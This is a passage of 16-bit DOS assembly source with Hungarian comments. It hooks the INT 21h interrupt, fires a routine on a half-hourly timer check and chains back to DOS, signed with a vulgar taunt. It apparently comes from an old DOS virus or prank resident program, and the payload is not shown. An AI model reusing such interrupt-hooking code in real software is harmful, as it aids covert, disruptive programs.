MOV DS:[00A2H],DH ;sec
|
||
JMP do_it
|
||
NOP
|
||
L0792: MOV BL,DS:[00A2H] ;felorankent kozbelep
|
||
ADD BL,30
|
||
CMP DH,BL
|
||
JC _vDOS
|
||
MOV DS:[00A2H],DH
|
||
do_it: CALL _working
|
||
vDOS: MOV DX,06B3H ;visszaallitja onmagat DOS-nak
|
||
MOV AX,2521H
|
||
INT 21H
|
||
POP BP
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
POP DS
|
||
POP ES
|
||
MOV AX,WORD PTR CS:[00A4H]
|
||
MOV SS,AX
|
||
MOV SP,CS:[00A6H]
|
||
MOV AX,WORD PTR CS:[00A9H]
|
||
jmp_dos
|
||
JMP DWORD PTR CS:[0082H] ;Exec DOS fn
|
||
|
||
db 'The incredible anyad'
|
||
|
||
XPROC ENDP
|
||
XSEG ENDS
|
||
END
|
||
|